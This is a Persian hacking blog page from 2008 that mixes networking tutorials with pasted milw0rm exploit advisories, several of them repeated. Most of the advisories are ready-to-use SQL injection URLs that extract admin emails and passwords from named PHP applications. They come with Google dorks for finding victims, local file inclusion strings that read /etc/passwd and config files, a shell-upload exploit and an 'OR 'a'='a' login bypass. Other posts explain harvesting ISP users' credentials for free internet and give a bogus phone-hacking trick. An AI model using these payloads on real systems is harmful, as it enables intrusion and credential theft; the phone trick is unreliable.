خودتون بگین
دیگه نمی دونم چی بذارم خودتون بگین
+ نوشته شده در ساعت 19:34 توسط محمد
|
| تبليغات | X |
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit:
[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# milw0rm.com [2008-04-15]برای دیدنش به ادامه مطالب بروید به صورت عکس است
########################################## # # Koobi Pro 6.25 poll Remote SQL Injection Vulnerability # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 ##WEBSiTE: http://www.xcorpitx-hack.com/Forum/ ####BLOG : http://my.opera.com/SQL-Injection/blog/ ####MAiL : hackturkiye.hackturkiye@gmail.com # ########################################### # # DORK 1 : allinurl: "index.php?p=poll"showresult # # DORK 2 : allinurl: poll_id "showresult" # ########################################### EXPLOiT : index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user ********************************************* WEBSiTE: http://www.xcorpitx-hack.com/Forum ********************************************* ********************S@BUN******************** ********************************************* # milw0rm.com [2008-04-14]
########################################## # # Koobi Pro 6.25 poll Remote SQL Injection Vulnerability # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 ##WEBSiTE: http://www.xcorpitx-hack.com/Forum/ ####BLOG : http://my.opera.com/SQL-Injection/blog/ ####MAiL : hackturkiye.hackturkiye@gmail.com # ########################################### # # DORK 1 : allinurl: "index.php?p=poll"showresult # # DORK 2 : allinurl: poll_id "showresult" # ########################################### EXPLOiT : index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user ********************************************* WEBSiTE: http://www.xcorpitx-hack.com/Forum ********************************************* ********************S@BUN******************** ********************************************* # milw0rm.com [2008-04-14]
تقدیم به مرجان که در خواست کرده بودن
############################################ # # Pollbooth v2.0 SQL Injection Vulnerability # ############################################ # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 ##WEBSiTE: http://www.xcorpitx-hack.com/Forum/ ####BLOG : http://my.opera.com/SQL-Injection/blog/ ############################################### # # DORK 1 : allinurl: "pollBooth.php?op=results"pollID # ############################################# EXPLOiT : pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users ********************************************* WEBSiTE>>>http://www.xcorpitx-hack.com/Forum/ ********************************************* ********************S@BUN******************** ********************************************* # milw0rm.com [2008-04-13]
مدل TCP/IP که برای ارتباط اينترنتی بهکار میرود، میتوان به لايههای مختلفی تقسيمبندی کرد که بعدا بيشتر توضيح میدم، اما يکی از اين لايهها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP :
۱- (TCP (Transmission Control Protocol :
اين پروتکل قویتر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب میشود. اين پروتکل توانايی بازبينی بستههاو کنترل خطا را هم دارد.
۲- (UDP (User Datagram Protocol :
اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است.
نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار میکنيم، اين ارتباط میتواند از نوع TCP يا UDP باشد. بنابراين وقتی میخواهيم يک کامپيوتر خاصی را از نظر پورتها بررسی کنيم، هردو بايد بررسی شود.
- تقسيمبندی پورتها از روی شماره آنها
۱- پورتهای 0 تا 1023 :
مشهورترين پورتها هستند و معمولا هرکدام برای يک سرويس خاص استفاده میشود. با تعدادی از اين پورتها در جلسات قبل آشنا شدهايد.
۲- پورتهای 1024 تا 49151 :
اين سری از پورتها مشخصا با هيچيک از سرويسهای اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرمافزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرمافزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار میکنيد، يکی از اين پورتها به صورت random باز شده و يک ارتباط با سرور (با توجه بهنوع سرويس اينترنتی که میدهد که يکی از پورتهای 0 تا 1023 است) برقرار شده و دادهها ارسال و دريافت میشوند. يعنی پورت شما يکی از پورتهای اين قسمت است و پورت سرور يکی از پورتهای بالايی.اين سری پورتها را پورتهای register شده هم میگويند.
۳- پورتهای 49152 تا 65535 :
اين سری از پورتها بهندرت استفاده میشوند. کاربرد اساسی آنها برای يک سری سرويسهای خاص اينترنتی است و يا توسط trojanها (که برای Hack کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورتهای رديف ۲ هم استفاده میکنند و اين تقسيمبندیها هميشه برقرار نيست و بههمين علت است که گاهی پورتها را به دودسته زير 1024 و بالای 1024 تقسيم میکنند.
- تکميل ليست پورتها
در جلسه دوم در مورد مهمترين پورتها صحبت کردم. حالا يک ليست کاملتر را در اين درس میگم. اگر میخواهيد يک مرجع نسبتا کامل برای مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد درس امروز و نيز لينک بالا هيچ بحثی در مورد تروجانها نمیکند زيرا تروجانهای شناخته شده هم يک سری پورت پيشفرض دارند که در جای خود بحث خواهد شد.
Ports TCP/UDP Service or Application
------ ------- ----------------------------------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp https/ssl
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def
- چگونه به يک پورت Telnet کنيم؟
برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورتهايی را که ممکن است اطلاعاتی مهم را در اختيار هکرها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
در اين دستور بهجای hostname شماره ip و يا نام سايت را وارد میکنيد و بهجای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست میدهد در کامپيوتری به اسم www.iums.ac.ir مينويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام میدهد، زيرا بعضی از پورتها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوترهای مختلف و پورتهای گوناگون تلنت کنيد
منبع:http://www.amirihackerr.blogfa.com
عبارتی که باید آنرا جستجو کنید : 
powered by Advanced Guestbook 2. + inurl:guestbook/admin.php
يا
inurl:guestbook + inurl:admin.php
و به جای رمز عبارت زیر را وارد کنید
OR ('a' = 'a ('
منبع:http://www.amirihackerr.blogfa.com
دانلود در ادامه مطالب
حجمش خیلی کمه
########################################## # # Provozováno na RS MAXSOFT SQL-Injection # # PAGE:http://redakcni-system.maxsoft.cz/ # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####BLOG : http://my.opera.com/SQL-Injection/blog/ # # ########################################### # # DORK 1 : "RS MAXSOFT" # # DORK 2 : "Provozováno na RS MAXSOFT" # ########################################### you will see adminname and password on title EXPLOiT: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin ADMiN LOGiN=admin.php?page=logfrm ########################################### ------------------S@BUN-------------------# ########################################### ########################################### --http://my.opera.com/SQL-Injection/blog/-# ########################################### # milw0rm.com [2008-04-10]
در این صورت هر پیغام شما برای اون در یک صفحه جدید باز می شه
########################################## # # Provozováno na RS MAXSOFT SQL-Injection # # PAGE:http://redakcni-system.maxsoft.cz/ # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####BLOG : http://my.opera.com/SQL-Injection/blog/ # ####MAiL : hackturkiye.hackturkiye@gmail.com # ########################################### # # DORK 1 : "RS MAXSOFT" # # DORK 2 : "Provozováno na RS MAXSOFT" # ########################################### you will see adminname and password on title EXPLOiT: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin ADMiN LOGiN=admin.php?page=logfrm ########################################### ------------------S@BUN-------------------# ########################################### -----hackturkiye.hackturkiye@gmail.com----# ########################################### --http://my.opera.com/SQL-Injection/blog/-# ########################################### # milw0rm.com [2008-04-10]
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discoverd by dun \ dun[at]strcpy.eu ]
#####################################################
# [ Ksemail ] Local File Include Vulnerability #
#####################################################
#
# Script site: http://www.ksemail.com/, http://mail.ksemail.com
#
# Vuln:
# http://site.com/prog/index.php?language=../../../../../../etc/passwd
# http://site.com/prog/index.php?lang=../../../../../../etc/passwd
#
# Dork example: "FoxMail/Outook"
#
###############################################
# Greetz: D3m0n_DE, nejman, sid_psycho
# and all otherz.. [;
###############################################
[ dun / 2008 ]
********************************************************************************************
# milw0rm.com [2008-04-10]
۱.اگر طرف مقابل شما را در لیستش نداشته باشد، در بالای صفحه به صورت زیر اسم ها را مشاهده خواهیم کرد: Yahoo Send ID Instant Messenger در این صورت می بینید که بین ID دوست شما و Instant Messenger فقط یک خط وجود دارد که این نشان می دهد که طرف مقابل شما را Add نکرده است.
۲.اگر بین ID دوست شما و Instant Messenger دو خط دیده شود مانند: Yahoo Send ID…Instant Messenger در این صورت ID شما در لیست دوستان تان وجود دارد.
۱- از منوی start بر روی گزینه run کلیک کنید. تا داس تحت ویندوز برای شما باز شود.
۲-در این مرحله شما باید کلمه :c نوشته و Enter را بزنید.
۳- حالا برای فرستادن یا پیغام باید خط زیر را وارد کنید.
NET SEND * SALAM
گزینه * نمایان گر این است که پیغام سلام برای همه ی یوزر ها فرستاده میشود.
به جای SALAM هم شما میتوانید هر متنی را که دوست داشتید بنویسید.
---> برای فرستادن پیغام برای یکی از یوزر ها شما باید COMPUTER NAME یوزر مورد نظر در قسمت * وارد کنید در این صورت پیغام شما فقط برای یوزر مورد نظر فرستاده میشود.
برای مثال اگر COMPUTER NAME یوزر مورد نظر شما FREE-AMOZESH بود باید متن زیر را بنویسید.
NET SEND FREE-AMOZESH SALAM
بین هر کلمه باید یک SPACE بزنید.
منبع:http://www.free-amozesh.blogsky.com
########################################## # # Provozováno na RS MAXSOFT SQL-Injection # # PAGE:http://redakcni-system.maxsoft.cz/ # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####BLOG : http://my.opera.com/SQL-Injection/blog/ # # ########################################### # # DORK 1 : "RS MAXSOFT" # # DORK 2 : "Provozováno na RS MAXSOFT" # ########################################### you will see adminname and password on title EXPLOiT: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin ADMiN LOGiN=admin.php?page=logfrm ########################################### ------------------S@BUN-------------------# ########################################### -----hackturkiye.hackturkiye@gmail.com----# ########################################### --http://my.opera.com/SQL-Injection/blog/-# ########################################### # milw0rm.com [2008-04-10]
هک آی اس پی(کارت اینترنت)
می خوام بهتون برنامه ای معرفی کنم و طریقهء استفاده از اون را براتون بنویسم که همه ی کاربران ویندوز ایکس پی اون برنامه را می شناسند و یا تو کامپیوتر خود دارند ولی ازش استفاده نمی کنند.
این برنامه ی جالب هایپرترمینال HyperTerminal هستش.این برنامه رو از آدرس زیر میتونید پیدا کنید.
Start Menu\All Programs\Accessories\Communications\HyperTerminal
در کل کار این برنامه فرستادن و گرفتن فایل و چت و ارتباط بین دو کامپیوتر بدون استفاده از کارت اینترنت هست. یعنی دو تا کامپیوتر می تونن توسط اون با همدیگر ارتباط برقرار کنن و فایلهایی را برای هم بفرستن.اگه آموزش هایپر ترمینال هم خواستید تو نظرات بگید تا هر چه زودتر براتون بزارم تو وبلاگ.چون کارای جالبی با این برنامه میشه انجام داد.
حالا بریم سر اصل مطلب: ابتدا برنامه را اجرا کنید. در این قسمت یک اسمی برای ارتباط خودتون وارد کنید. فرقی نمی کنه چه باشه. در قسمت دوم شماره تلفن ISP تون رو بنویسید که می خواهید هکش کنید.
حالا با زدن دکمه ی Conect شما به آی اس پی تون وصل میشید . حالا با زدن کلید اینتر یه چیزهایی تو صفحه ی سفید برنامه نوشته می شوند که اگر نامفهوم بود یک آی اس پی دیگه را امتحان کنید و اگر قابل فهم بود چیزهایی مثل این را مشاهده کردید که همگی بستگی به اون شرکت داره اما زیاد تفاوتی نمی کنن.
Welcome To ROUTER
Username :
PassWord :
شما حتما باید یک کارت اینترنت داشته باشید از اون شرکت تا بتونید وارد سیستمش بشید . که تو اینجا با وارد کردن اسم رمز و پسورد (پسورد وقتی می خواهید بنویسید دیده نمیشه چیزهایی مثل اعلان داس را میبینید:
Router 
_
حال شما به مرحلهء حساسی وارد شدید که خیلی مهمه. بله اینجا قلب سیستم هستش یعنی شما با نوشتن چیزهایی که میگم می تونید اطلاعات مهم و حیاطی از اون شرکت را بدست بیارید از جمله شماره ی کارت اینترنت کسایی که روی خط هستن و شماره ی آی پی (درباره ی آی پی IP فعلا چیزی نمیگم ولی اگه خواستین تو نظرات بگید تا براتون آموزش رو براتون بزارم)
در اینجا چند تا از فرمانهای حساس اون رو براتون توضیح می دم :
Systat با نوشتن این فرمان اطلاعاتی از کلیهء اسم رمزهای کسایی که روی خط هستن را براتون نمایش می ده.
Login با صادر کردن این فرمان می تونید به آی پی های دیگران وصل شوید.
Help نمایش کلیهء فرمانهای مجاز.
نکته ی مهم که باید بگم اینه که در این نوع ارتباط فرمانهایی وجود دارن مثل ایجاد حساب و یا حذف حساب که شما نمی تونید این کارها رو انجام بدید. برای این کار باید اسم رمز خاصی را در اول برنامه بنویسید که اون هم در اختیار صاحب آی اس پی هست.
حالا با این روش شما میتونید اینترنت مجانی استفاده کنید البته اگه وجدان دارید نکنید .دلتون میاد یکی همین بلا رو سر شما بیاره؟
منبع:http://download2.ir
1- اشنايي با شبكه كه خب همينطور كه اكثر شما ميدونين از دونستن اطلاعات مقدماتي در مورد TCP/IP و لايه هاي مختلفش شروع ميشه كه هميشه پيشنهاد شده براي درك بهتر اين مبحث اول به بررسي 7 لايه مرجع OSI يا همون open system Interconnection بپردازيم بعد بريم سراغ 4 لايه TCP/IP بعد از اشنايي با لايه ها ما بايد با مفهوم IP يا همون Internet protocol اشنا بشيم يعني بدونيم ساختار يك IP چيه و بسته هاي IP چي هستند و چه جوري ميتونيم بفهميم كه يك IP ماله چه كلاسي هست (A,b,..) بعد با مفهوم پورت ها و اينكه هر پورت وظيفش چيه و ........ و مسلما هر چي بيشتر بدونيم در مورد شبكه مارو در نفوذ كمك ميكنه
2- بعد ما اصلا ميخوايم چيكار كنيم ايا هدفمون از كار انداختن يك سرويس دهنده هست كه باز بحث DOS يا Denial Of Service پيش مياد يا اينكه نفوذ از يك اسيب پذيري خاص مثلا يك سريز شدن بافر كه بحث اسيب شناسي پيش مياد
3 - اصلا چه جوري ما اين اسيب پذيري ها رو پيدا كنيم؟ ما بايد بشنيم با يك vul scanner سرويس دهنده مورد نظر رو تست كنيم مثل Nessus يا برنامه هاي ديگه گيريم اسيب پذيري رو پيدا كرديم حالا مسئله اينه كه چه جوري بايد استفاده كنيم از اين حفره
نكته : يه چيزي كه اصلا بهش توجه نميشه و همه دنبال محيط هاي گرافيكي و زدن يكي دوتا كليد ساده هستن اشنايي با Command Prompt هست مثلا وقتي يك نفر نتونه حتي از طريق داس ليست فايل ها و فولدر هاي يك درايو رو ببينه چه جوري ميخواد با netcat كار كنه!؟ پس ياد گيري داس هم يكي از فاكتورهاي مهم هست
4 - حالا ما ممكن بخوايم يك Backdoor نصب كنيم ؟ بايد بدونيم كه چه چيزي لازم داريم ميتونه netcat باشه كه نقش يك درب پشتي رو ايفا كنه يا BO2K و......
5 - ممكن مثلا سايت هدف از ديتابيس SQL استفاده كنه كه باز ما بايد با دستورات SQL تا حدي اشنا باشيم و بدونيم چه جوري عمل SQL INJECTION رو انجام بديم حداقل بونيم QUERY چيه!
6 - از همه مهمتر شما بايد با يك زبان برنامه نويسي مثل C اشنا باشيد يا حداقل اصول برنامه نويسي رو بدونيد چون همش نميشه از ابزارهاي اماده استفاده كرد
بيبن بحث در اين باره خيلي مفصله اگه ميبيني يه سري از سايت ها مثل اب خوردن هك ميشن مثلا سايت هايي كه از نواك استفاده ميكنن به نظر من نه اين كار هك كردن اسمشه نه اون بنده خدايي كه اين كار و كرده هكر! چون يه عده ادم باهوش و حرفه اي ميان مشكلات اين برنامه ها رو پيدا ميكنن و نه تنها براي تخريب بلكه براي بهبود امنيت در اختيار ديگران قرار ميدن و يه سري هم هستن كه هر روز سايت هايي مثل Security focus رو چك ميكنند به محضي كه يك كد اماده پيدا كردن شروع ميكنن مثلا هك كردن سايت هاي ديگران كه خب اگه اينكارشون بدون خرابكاري و پاك كردن اطلاعات باشه باز خوبه اونوقت مدير سايت ميره مشكلات رو برطرف ميكنه نه اينكه ور داره هر چي اطلاعات داره سايت پاك كنه!
چون ميدونم خيلي ها دنبال اين مباحث هستن من مسئوليت اموزش كامل شبكه رو بر عهده ميگرم و طي حدود 15 مقاله سعي ميكنم تمام موضوعات مورد نظر رو بگم ايشالا از اساتيد گروه يكيشون همت ميكنه و اموزش هك و امنيت رو ميده من توضيحات بالا رو نگفتم براي اينكه تو دل شما رو خالي كنم ولي اين يك حقيقت كه شما بايد راه درازي رو براي اين كار طي كنيد و هر روز به دنبال ياد گيري مسئله جديدي باشيد ميتونيد براي شروع از مقالاتي كه در مورد شبكه خواهم نوشت اغاز كنيد در كنارش يك زبان برنامه نويسي رو براي شروع بياموزيد خدارو شكر تو گروه دوستاني هستن كه به سوالات شما در زمينه برنامه نويسي پاسخ بدن اگرم كسي جواب نده باز ما مهدي رو داريم و مطمئنم از تجربياتش ميتونيد استفاده كنيد و سوالاتتونو بپرسين اصلا ما اين گروه رو از روز اول براي رفع مشكلات شما راه انداختيم تا اينجا كه اومديم ايشالا تا اخرشم هستيم به شرط اينكه بچه ها هم هواي مارو داشته باشن و كمكون كنن و مارو دست تنها نزارن و واقعا وضيعت كاري ما رو هم درك كنن خيليا بودن كه رفيق نيمه راه بودن واسه گروه يه جورايي اولش داغ بودن و بعد مارو ول كردن و شايد الان چند ماه هم بشه كه سري به سايت نزنن ولي نميخوام بگم هر چي دارن از مشهدتيم دارن ولي خودشون ميدونن و خداي بالا سرشون كه روزي كه تو گروه اومدن حتي كوچكترين مسئله رو هم بلد نبودن تمام بچه ها اطلاعاتشون در اختيار هم گذاشتن و مطمئنم و به اين موضوع ايمان دارم كه هيچ توقعي هم ندارن فقط تنها چيزي كه يك گروه از اعضاش ميخواد اينه كه فعاليتش مستمر باشه اونم در حد توانش حالا يه سري استثنا هم هستن كه واقعا مشكل براشون پيش اومد و نتونستن كار كنن باز دم بچه هايي كه از اول با ما بودن گرم و اين دوستاني كه جديد اضافه شدن به گروه خداشكر كه حداقل شما هيچ وقت پشت مشهدتيم رو خالي نميكنيد حتي اگه مطلب اموزشي نمينويسند ولي باز با گروه همراه هستن و سري به سايت ميزنن- به اميد موفقيت بيش از پيش براي مشهدتيم
منبع:http://www.mashhadteam.com
------------------------------------------------------------------------- -- JIKI Team [ JIKO + KIl1er ] --- ------------------------------------------------------------------------- # Author : jiko # email : jalikom@hotmail.com # Home : www.no-back.org # Script : gallery-script-lite # Bug : Remote Local File Inclusion Vulnerability # Download : http://www.arwscripts.com/gallery-script-lite.html # Dork : developed by ARWScripts.com # file : download.html # Error : =========================JIkI Team=================== # Exploit : http://[site]/[script]/download.html?path= #ex : download.html?path=config.inc.php http://www.[site].com/demos/galleryscriptlite/download.html?path=config.inc.php =========== greetz : all my friend and H-T Team and all No-back members and tryag.Com visit: www.no-back.org & www.tryag.com ------------------------------------------------------------------------- -- JIKI Team [ JIKO + KIl1er ] -- ------------------------------------------------------------------------- # milw0rm.com [2008-04-09]
اين كد باعث پخش شدن 7 ستاره در صفحه ميشه
منبع:http://javaa.blogfa.com
برای دانلود به ادامه مطالب بروید
برای دانلود نرم افزار همراه با آموزش به ادامه مطالب بروید
حجمشون کم است
پسورد فایل ها:p30cracker.blogfa.com
شما نیز تاکنون با سیم کارت های سومین اپراتور کشور به نوعی سر و کار داشته اید. سیم کارت های ایرانسل به دلیل نوآوری های متعدد و تبلیغات گسترده و به ویژه قیمت پایین توانسته است حضور موفقی را در عرصه مخابراتی کشور داشته باشد و با استقبال گسترده مردم روبرو شده است. چرا که دیگر شما تنها با 15 هزار تومان یک خط خواهید داشت! به همین دلیل ابتکارات و ویژگی های منحصر به فرد این سیم کارت ها ، مشکلات و نقص هایی که ایرانسل به همراه دارد نیز به نوعی مخفی شده است. علاوه بر توانمندی هایی همانند GPRS و MMS ، ایرانسل قابلیتهای دیگری هم دارد که بسیاری از افراد از آنها بی خبرند. یکی از قابلیتهای فوق العاده ایرانسل که به تازگی ایجاد شده است ، SMS Chat Zone نام دارد. ابزاری که شاید همینک با معرفی آن شما را به خرید یک سیم کارت ایرانسل وسوسه کند! SMS Chat Zone ابزاری است کاملأ رایگان و مجانی که به وسیله آن میتوانید یک ابزار چت کامل را از طریق SMS Chat روی گوشی خود داشته باشید. توسط SMS Chat Zone شما میتوانید با دوستان خود که ایرانسل دارند چت کنید ، دوستان جدیدی را جستجو و پیدا کنید ، از اتاق های چت استفاده کنید و در کل یک محیط چت کامل را روی گوشی خود داشته باشید. همچنین توسط SMS Chat Zone ، شما میتوانید پیام ها و آفلاین های دریافتی در یاهو مسنجر را هم به صورت SMS روی گوشی خود دریافت کنید که خود این موضوع نیز بسیار جالب است! در این ترفند قصد داریم به معرفی نحوه کامل استفاده از SMS Chat Zone به طور کامل بپردازیم.
برای دانلود و دیدنش به ادامه مطالب بروید
########################################## # # Koobi v4.4,V5.4 gallery (img_id) # ONLY 4.4 AND 5.4 ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####BLOG : http://my.opera.com/SQL-Injection/blog/ # ####MAiL : hackturkiye.hackturkiye@gmail.com # ########################################### # # DORK 1 : allinurl: "index.php?p=gallerypic img_id" ########################################### EXPLOiT 1: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user EXPLOiT 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user admin login=admin/login.php password under page ########################################### ------------------S@BUN-------------------# ########################################### -----hackturkiye.hackturkiye@gmail.com----# ########################################### --http://my.opera.com/SQL-Injection/blog/-# ########################################### # milw0rm.com [2008-04-08]
لطفا برای دانلود به ادامه مطالب بروید
############################################################################## # ChartDirector Ver 4.1 (viewsource.php) Remote File Disclosure Vulnerability # # D Script : http://www.advsofteng.com/download.html # # # By : Stack-Terrorist [v40] # # POC : http://site.com/chartdirector/phpdemo/viewsource.php?file=viewsource.php # # ############################################################################## # Greetz : Tryag-Team -JIKI Team GoLd_M [Mahmod_Ali] -H-T Team -RoMaNcYxHaCkEr -Str0ke ############################################################################## # milw0rm.com [2008-04-07]
منبع:http://forum.majidonline.com/showthread.php?t=32570
برای دانلود به ادامه مطالب بروید
قابل اجرا بر روی تمامی گوشی های موبایل
منبع:gsm.ir
برای دیدن عکسش و دانلود به ادامه مطالب بروید
------------------------------------------------------------------------- -- JIKI Team [ JIKO + KIl1er ] --- ------------------------------------------------------------------------- # Author : jiko [jiki team] # email : jalikom@hotmail.com # Home : www.no-back.org # Script : Blog PixelMotion # Bug : Remote File Upload Vulnerability # Download : http://www.pixelmotion.org/zip/blog.zip =========================JIkI Team=================== # Exploit : uploa your shell http://[Site]/[script]/admin/modif_config.php http://[Site]/[script]/templateZip/[shell] ###################OR################ upload your shell compressed by Zip forme http://[Site]/[script]/admin/modif_config.php after upload your shell go to http://[Site]/[script]/templates/[shell] because your sheel has extract at templates and has upload at templateZip =========================JIKI Team=================== greetz : all my friend and H-T Team ------------------------------------------------------------------------- -- JIKI Team [ JIKO + KIl1er ] -- ------------------------------------------------------------------------- # milw0rm.com [2008-04-06]
--==+================================================================================+==-- --==+ Prozilla Forum Service SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: 7 April 2008 Script Download: http://prozilla.com DORK: N/A Vendor Has Not Been Notified! DESCRIPTION: Prozilla Forum Service is vulnerable due to a insecure mysql query, this allows the remote attacker to pull user credentials from the database, and possibly load a shell using OUTFILE. and even read local files using load_file() SQL Injection: http://site.com/forum.php?forum=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(name,0x3a,password),3,4/**/FROM/**/users/* NOTE/TIP: admin login is at /siteadmin/ admin login can be found in config.php which can be viewed by using load_file(). GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+================================================================================+==-- --==+ Prozilla Forum Service SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- # milw0rm.com [2008-04-06]
################################################################################### # # # MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability # # # # found by: Lidloses_Auge # # Contact (ICQ): 120946783 # # Greetz to: free-hack.com # # # ############################################################################################################################################### # # # Vulnerability: # # # # Document: pages.php # # GET-Parameter: page # # # # Dork: # # # # inurl:"pages.php" + intext:"powered by mybb" # # # # Example: # # # # http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* # # # # Notes: # # # # Successrate depends on the permissions which could be set for viewing the 'page' # # # ############################################################################################################################################### # milw0rm.com [2008-04-06]
سلام دوستان عزیز راستش خودم بدجوری دنبال این بودم
گفتم که شایدم که یکی مثل من باشه -> پس گفتم که بزارمش بچه ها استفاده کنن -> امیدوارم خوشتون بیاد
برای هک کردن موبایل کسی باید گوشی اون رو یک بار به دستتون بگیرید و شماره تلفن خودتون رو به صورت زیر بگیرید.مثلا اگر شماره شما :: ۰۹۱۷۷۸۲۵۰۱۰ بود شما باید به صورت :
*۰۹۱۷۷۸۲۵۰۱۰ بگیرید یعنی جولوش یک ستاره بگذارید.و وقتی شما ره گرفته شد کافیه گوشیتونو بردارید تا ارتباط برقرار شود.خب حالا در واقع میتونیم بگیم که گوشی قربانی هک شد.و مرحله حساس این است که بدونیم چه جوری میشه بقیه کارو انجام داد.حالا ما در این حالت میتونیم ۳ تا کار رو آنجام بدبیم.در قسمت زیر به اون سه کار اشاره شده، د میزنم واین آموزش سه کاری است که در ادامه ترفند بالا بر روی گوشی قربانی قابل اجرا است:
۱:عدد ۲۳ رو شماره گیری کنید و بعد از شنیدن بوق آزاد شماره بگیرید و پول رو به حساب ..........۲:فقط کافیست بعد هک کردن گوشی دکمه * ( ستاره ) رو فشار بدید و خط قربانی رو کنترل کنید.۳:عدد ۶۷۶۷۵۴۳۲ رو شماره گیری کنید وok یا همان دکمه اتصال را فشار دهید بعد با پیغامی رو به رو میشوید که میگه ارتباط قطع شد یعنی گوشی سوخت.
کلیه این روشها امتحان شده هستند پس سعی کنید حتالمقدور در مورد گوشی ههای ارزان قیمت امتحان کنین که ضرر مالی زیادی گریبان گیر شما نشود!
